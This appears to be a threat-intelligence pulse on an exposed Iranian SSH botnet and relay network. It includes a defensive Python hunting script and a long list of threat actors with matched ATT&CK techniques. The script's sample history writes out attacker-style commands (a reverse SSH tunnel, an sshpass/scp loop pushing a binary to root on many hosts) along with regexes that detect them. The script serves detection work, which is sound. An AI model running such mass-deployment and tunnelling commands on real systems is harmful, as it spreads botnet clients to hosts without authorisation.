Trusted Design

Iranian Botnet Exposed via Open Directory: 15-Node Relay Network and Active C2

Summary

An Iranian threat actor's operational infrastructure was exposed through an open directory, revealing a 15-node relay network spanning Finland and Iran, an SSH-based botnet framework, and an active command-and-control (C2) server. The exposed bash history documented the full operation, including tunnel deployment, DDoS tooling development, and botnet creation. The actor compiled tooling on the hosts themselves to evade detection and used a Python script for mass SSH deployment. The botnet client, compiled on infected hosts and renamed 'hex', reconnected to the C2 automatically after losing its connection. The operation appears to be financially or personally motivated rather than state-directed, with the infrastructure dual-purposed for censorship bypass and attack operations.
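To make the artefact that exposed this operation usable for hunting, the following added example (not code from the pulse, the exposed directory, or the actor's toolkit) scans a shell-history export for the behaviours described above: compiler runs on the host, a build output renamed to hex and launched, SSH forwarding flags that set up relay tunnels, and ssh/scp loops or sshpass use for mass deployment. The sample history, the rule names and the 10-line chain window are constructed assumptions of this example.

```python
"""
Hunt for the staging pattern this pulse describes in an exported shell history.

Added example; it is not code from the pulse, the exposed directory, or the
actor's toolkit. Rule names, the sample history and the 10-line chain window
are this example's own assumptions.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample history (not the recovered bash history). Lines 2, 3 and 5
# form the compile -> rename to 'hex' -> execute chain; lines 6-8 are the
# tunnel, mass-deployment and archiving behaviours; the rest is noise.
SAMPLE_HISTORY = """\
cd /tmp/.src
gcc -O2 -pthread -o client client.c
mv client hex
chmod +x hex
nohup ./hex >/dev/null 2>&1 &
ssh -f -N -R 2222:127.0.0.1:22 relay@198.51.100.7
for h in $(cat hosts.txt); do sshpass -p 'pw' scp hex root@$h:/tmp/; done
tar czf logs.tgz /var/log
ls -la
"""

# (rule name, regex). Matching is per line; ordering is handled separately.
RULES = [
    # Compiler run on the victim host (ATT&CK T1027.004, Compile After Delivery)
    ("compile", re.compile(r"^\s*(?:sudo\s+)?(?:gcc|cc|clang|g\+\+|make)\b")),
    # Build output renamed to the short name the write-up reports
    ("rename_to_hex", re.compile(r"^\s*(?:mv|cp)\s+\S+\s+(?:\./)?hex\s*$")),
    # The renamed binary launched, typically backgrounded with nohup
    ("exec_hex", re.compile(r"(?:^|\s)(?:nohup\s+)?\./hex\b")),
    # SSH with remote/local/dynamic forwarding = tunnel/relay node setup
    ("ssh_tunnel", re.compile(r"^\s*ssh\b.*\s-[RLD]\s*\S+")),
    # Non-interactive password SSH or ssh/scp inside a shell loop = mass deploy
    ("mass_ssh", re.compile(r"\bsshpass\b|\bfor\s+\w+\s+in\b.*\b(?:ssh|scp)\b")),
    # Archive via utility (ATT&CK T1560.001)
    ("archive", re.compile(r"^\s*(?:tar\s+\S*[cz]\S*|zip\s+-r|7z\s+a)\b")),
]

# Ordered chain that separates a build box from a staging host.
CHAIN = ("compile", "rename_to_hex", "exec_hex")


@dataclass
class Finding:
    line: int   # 1-based line number in the history export
    rule: str
    cmd: str


def scan_history(text: str) -> List[Finding]:
    """Return one Finding per (line, rule) match, in line order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append(Finding(lineno, name, line.strip()))
    return findings


def staging_chains(findings: List[Finding], window: int = 10) -> List[List[int]]:
    """Line-number triples where compile, rename and execute occur in that
    order within `window` lines. A lone compiler hit is normal on a dev box;
    the ordered chain is the pattern the write-up attributes to the actor."""
    lines = {r: [f.line for f in findings if f.rule == r] for r in CHAIN}
    chains: List[List[int]] = []
    for c in lines["compile"]:
        for r in lines["rename_to_hex"]:
            if not c < r <= c + window:
                continue
            for e in lines["exec_hex"]:
                if r < e <= c + window:
                    chains.append([c, r, e])
    return chains


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count of hits per rule, for triage at a glance."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    hits = scan_history(SAMPLE_HISTORY)
    for h in hits:
        print(f"line {h.line:>3}  {h.rule:<14} {h.cmd}")
    print("chains:", staging_chains(hits), "summary:", summarize(hits))
```

Feed it each user's ~/.bash_history or the command field of auditd EXECVE records. The ordered compile-rename-execute chain, not any single hit, is the high-confidence signal; a compiler run alone is routine on a developer host. Absence of hits is weak evidence, since an operator can unset HISTFILE or truncate the history before leaving.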

Created: 2026-03-17

Indicators

Similar Pulses

No similar pulses were found.

Threat actors related to this pulse (fact-based)

HAFNIUM

Score: 40.66
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1590.005 - IP Addresses
  • T1016.001 - Internet Connection Discovery
  • T1583.005 - Botnet
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1593.003 - Code Repositories
  • T1592.004 - Client Configurations
  • T1083 - File and Directory Discovery
  • T1584.005 - Botnet
  • T1583.006 - Web Services
  • T1068 - Exploitation for Privilege Escalation
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS

menuPass

Score: 30.69
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1210 - Exploitation of Remote Services
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1036.003 - Rename Legitimate Utilities
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS

Wizard Spider

Score: 34.28
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1518.002 - Backup Software Discovery
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1210 - Exploitation of Remote Services
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1570 - Lateral Tool Transfer
  • T1555.004 - Windows Credential Manager
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link

APT33

Score: 12.19
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1040 - Network Sniffing
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link

Fox Kitten

Score: 34.11
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1505.003 - Web Shell
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1210 - Exploitation of Remote Services
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1585 - Establish Accounts
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS

CopyKittens

Score: 3.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1090 - Proxy

Volt Typhoon

Score: 72.20
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1016.001 - Internet Connection Discovery
  • T1584.008 - Network Devices
  • T1007 - System Service Discovery
  • T1590.004 - Network Topology
  • T1070.007 - Clear Network Connection History and Configurations
  • T1584.003 - Virtual Private Server
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1589 - Gather Victim Identity Information
  • T1505.003 - Web Shell
  • T1590.006 - Network Security Appliances
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1584.005 - Botnet
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1570 - Lateral Tool Transfer
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1518 - Software Discovery
  • T1596.005 - Scan Databases
  • T1003.003 - NTDS
  • T1090.001 - Internal Proxy

APT1

Score: 12.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1114.001 - Local Email Collection
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery

Mustang Panda

Score: 51.31
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1587.001 - Malware
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1205 - Traffic Signaling
  • T1572 - Protocol Tunneling
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1176.002 - IDE Extensions
  • T1016 - System Network Configuration Discovery
  • T1219.001 - IDE Tunneling
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1052.001 - Exfiltration over USB
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1518 - Software Discovery
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link

Play

Score: 16.82
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1048 - Exfiltration Over Alternative Protocol
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1018 - Remote System Discovery

Chimera

Score: 32.59
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1071.004 - DNS
  • T1114.001 - Local Email Collection
  • T1007 - System Service Discovery
  • T1572 - Protocol Tunneling
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1570 - Lateral Tool Transfer
  • T1111 - Multi-Factor Authentication Interception
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS

Sea Turtle

Score: 31.39
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1583 - Acquire Infrastructure
  • T1583.002 - DNS Server
  • T1114.001 - Local Email Collection
  • T1213.006 - Databases
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1608.003 - Install Digital Certificate
  • T1584.002 - DNS Server
  • T1071.001 - Web Protocols

APT39

Score: 27.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1071.004 - DNS
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1090.002 - External Proxy
  • T1083 - File and Directory Discovery
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
  • T1090.001 - Internal Proxy

RedCurl

Score: 17.07
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1114.001 - Local Email Collection
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1039 - Data from Network Shared Drive
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link

APT5

Score: 18.63
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1583.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1083 - File and Directory Discovery
  • T1554 - Compromise Host Software Binary

Agrius

Score: 19.24
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1583 - Acquire Infrastructure
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1562.001 - Disable or Modify Tools
  • T1570 - Lateral Tool Transfer
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery

GALLIUM

Score: 24.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1078 - Valid Accounts
  • T1036.003 - Rename Legitimate Utilities
  • T1570 - Lateral Tool Transfer
  • T1018 - Remote System Discovery

APT41

Score: 61.84
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1568.002 - Domain Generation Algorithms
  • T1003.002 - Security Account Manager
  • T1071.004 - DNS
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1104 - Multi-Stage Channels
  • T1071.002 - File Transfer Protocols
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1213.003 - Code Repositories
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1596.005 - Scan Databases
  • T1003.003 - NTDS
  • T1102.001 - Dead Drop Resolver

MuddyWater

Score: 41.54
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1218.003 - CMSTP
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1137.001 - Office Template Macros
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1104 - Multi-Stage Channels
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1562.001 - Disable or Modify Tools
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
  • T1204.001 - Malicious Link

APT28

Score: 68.91
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1584.008 - Network Devices
  • T1598.003 - Spearphishing Link
  • T1040 - Network Sniffing
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1071.003 - Mail Protocols
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1092 - Communication Through Removable Media
  • T1090.002 - External Proxy
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1090.003 - Multi-hop Proxy
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1598 - Phishing for Information
  • T1189 - Drive-by Compromise
  • T1498 - Network Denial of Service
  • T1071.001 - Web Protocols
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link
  • T1001.001 - Junk Data

Turla

Score: 55.95
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.001 - Internet Connection Discovery
  • T1587.001 - Malware
  • T1213.006 - Databases
  • T1007 - System Service Discovery
  • T1584.003 - Virtual Private Server
  • T1005 - Data from Local System
  • T1071.003 - Mail Protocols
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1584.006 - Web Services
  • T1068 - Exploitation for Privilege Escalation
  • T1102.002 - Bidirectional Communication
  • T1570 - Lateral Tool Transfer
  • T1555.004 - Windows Credential Manager
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link
  • T1090.001 - Internal Proxy

Sowbug

Score: 7.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1083 - File and Directory Discovery
  • T1039 - Data from Network Shared Drive

BRONZE BUTLER

Score: 23.71
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1562.001 - Disable or Modify Tools
  • T1039 - Data from Network Shared Drive
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1518 - Software Discovery
  • T1102.001 - Dead Drop Resolver

UNC3886

Score: 43.35
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1587.001 - Malware
  • T1040 - Network Sniffing
  • T1070.007 - Clear Network Connection History and Configurations
  • T1190 - Exploit Public-Facing Application
  • T1205 - Traffic Signaling
  • T1562.004 - Disable or Modify System Firewall
  • T1681 - Search Threat Vendor Data
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1205.001 - Port Knocking
  • T1554 - Compromise Host Software Binary
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer

Kimsuky

Score: 83.34
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1583 - Acquire Infrastructure
  • T1056.001 - Keylogging
  • T1587.001 - Malware
  • T1598.003 - Spearphishing Link
  • T1007 - System Service Discovery
  • T1040 - Network Sniffing
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1205 - Traffic Signaling
  • T1562.004 - Disable or Modify System Firewall
  • T1071.003 - Mail Protocols
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1071.002 - File Transfer Protocols
  • T1534 - Internal Spearphishing
  • T1562.001 - Disable or Modify Tools
  • T1593.001 - Social Media
  • T1102.002 - Bidirectional Communication
  • T1598 - Phishing for Information
  • T1585 - Establish Accounts
  • T1111 - Multi-Factor Authentication Interception
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
  • T1588.005 - Exploits
  • T1102.001 - Dead Drop Resolver

APT3

Score: 21.79
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1005 - Data from Local System
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1083 - File and Directory Discovery
  • T1104 - Multi-Stage Channels
  • T1203 - Exploitation for Client Execution
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link

FIN8

Score: 14.29
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.001 - Internet Connection Discovery
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1486 - Data Encrypted for Impact
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link

Ke3chang

Score: 29.51
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1071.004 - DNS
  • T1587.001 - Malware
  • T1583.005 - Botnet
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1078 - Valid Accounts
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS

Lotus Blossom

Score: 19.94
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.001 - Internet Connection Discovery
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1090.003 - Multi-hop Proxy
  • T1134 - Access Token Manipulation
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1090.001 - Internal Proxy

FIN13

Score: 46.70
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1016.001 - Internet Connection Discovery
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1590.004 - Network Topology
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1589 - Gather Victim Identity Information
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1134.003 - Make and Impersonate Token
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
  • T1556 - Modify Authentication Process
  • T1090.001 - Internal Proxy

Earth Lusca

Score: 35.47
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1583.004 - Server
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link

Magic Hound

Score: 80.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1590.005 - IP Addresses
  • T1016.001 - Internet Connection Discovery
  • T1114.001 - Local Email Collection
  • T1598.003 - Spearphishing Link
  • T1071 - Application Layer Protocol
  • T1005 - Data from Local System
  • T1562 - Impair Defenses
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1589 - Gather Victim Identity Information
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1486 - Data Encrypted for Impact
  • T1573 - Encrypted Channel
  • T1592.002 - Software
  • T1102.002 - Bidirectional Communication
  • T1570 - Lateral Tool Transfer
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1591.001 - Determine Physical Locations
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service

Aquatic Panda

Score: 12.05
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1595.002 - Vulnerability Scanning
  • T1036.004 - Masquerade Task or Service
  • T1562.001 - Disable or Modify Tools

INC Ransom

Score: 18.66
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1046 - Network Service Discovery

Akira

Score: 15.83
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1558 - Steal or Forge Kerberos Tickets
  • T1219 - Remote Access Tools
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1018 - Remote System Discovery

ToddyCat

Score: 12.22
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1083 - File and Directory Discovery
  • T1018 - Remote System Discovery
  • T1566.003 - Spearphishing via Service

Ember Bear

Score: 48.33
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1491.002 - External Defacement
  • T1003.002 - Security Account Manager
  • T1071.004 - DNS
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1210 - Exploitation of Remote Services
  • T1090.003 - Multi-hop Proxy
  • T1562.001 - Disable or Modify Tools
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1585 - Establish Accounts
  • T1595.001 - Scanning IP Blocks
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1588.005 - Exploits

Indrik Spider

Score: 19.88
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1585.002 - Email Accounts
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1584.004 - Server
  • T1018 - Remote System Discovery

Contagious Interview

Score: 51.27
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1588.007 - Artificial Intelligence
  • T1587.001 - Malware
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1071.003 - Mail Protocols
  • T1681 - Search Threat Vendor Data
  • T1585.002 - Email Accounts
  • T1593.003 - Code Repositories
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1546.004 - Unix Shell Configuration Modification
  • T1593.001 - Social Media
  • T1585 - Establish Accounts
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service

Sandworm Team

Score: 76.37
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1056.001 - Keylogging
  • T1491.002 - External Defacement
  • T1587.001 - Malware
  • T1213.006 - Databases
  • T1598.003 - Spearphishing Link
  • T1040 - Network Sniffing
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1585.002 - Email Accounts
  • T1591.002 - Business Relationships
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1584.005 - Botnet
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1592.002 - Software
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1499 - Endpoint Denial of Service
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link

Star Blizzard

Score: 17.73
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1585.002 - Email Accounts
  • T1598.002 - Spearphishing Attachment
  • T1078 - Valid Accounts

APT38

Score: 22.86
Matched TTPs:
  • T1056.001 - Keylogging
  • T1005 - Data from Local System
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1562.001 - Disable or Modify Tools
  • T1486 - Data Encrypted for Impact
  • T1036.003 - Rename Legitimate Utilities
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link

Ajax Security Team

Score: 4.46
Matched TTPs:
  • T1056.001 - Keylogging
  • T1566.003 - Spearphishing via Service

Darkhotel

Score: 7.96
Matched TTPs:
  • T1056.001 - Keylogging
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise

Tonto Team

Score: 12.78
Matched TTPs:
  • T1056.001 - Keylogging
  • T1505.003 - Web Shell
  • T1090.002 - External Proxy
  • T1210 - Exploitation of Remote Services
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution

Threat Group-3390

Score: 30.81
Matched TTPs:
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1608.002 - Upload Tool
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1210 - Exploitation of Remote Services
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery

Lazarus Group

Score: 49.09
Matched TTPs:
  • T1056.001 - Keylogging
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1562.004 - Disable or Modify System Firewall
  • T1585.002 - Email Accounts
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1104 - Multi-Stage Channels
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1036.003 - Rename Legitimate Utilities
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1046 - Network Service Discovery
  • T1566.003 - Spearphishing via Service
  • T1090.001 - Internal Proxy

PLATINUM

Score: 5.80
Matched TTPs:
  • T1056.001 - Keylogging
  • T1068 - Exploitation for Privilege Escalation
  • T1189 - Drive-by Compromise

FIN4

Score: 8.65
Matched TTPs:
  • T1056.001 - Keylogging
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link

OilRig

Score: 38.88
Matched TTPs:
  • T1056.001 - Keylogging
  • T1071.004 - DNS
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1219 - Remote Access Tools
  • T1572 - Protocol Tunneling
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1078 - Valid Accounts
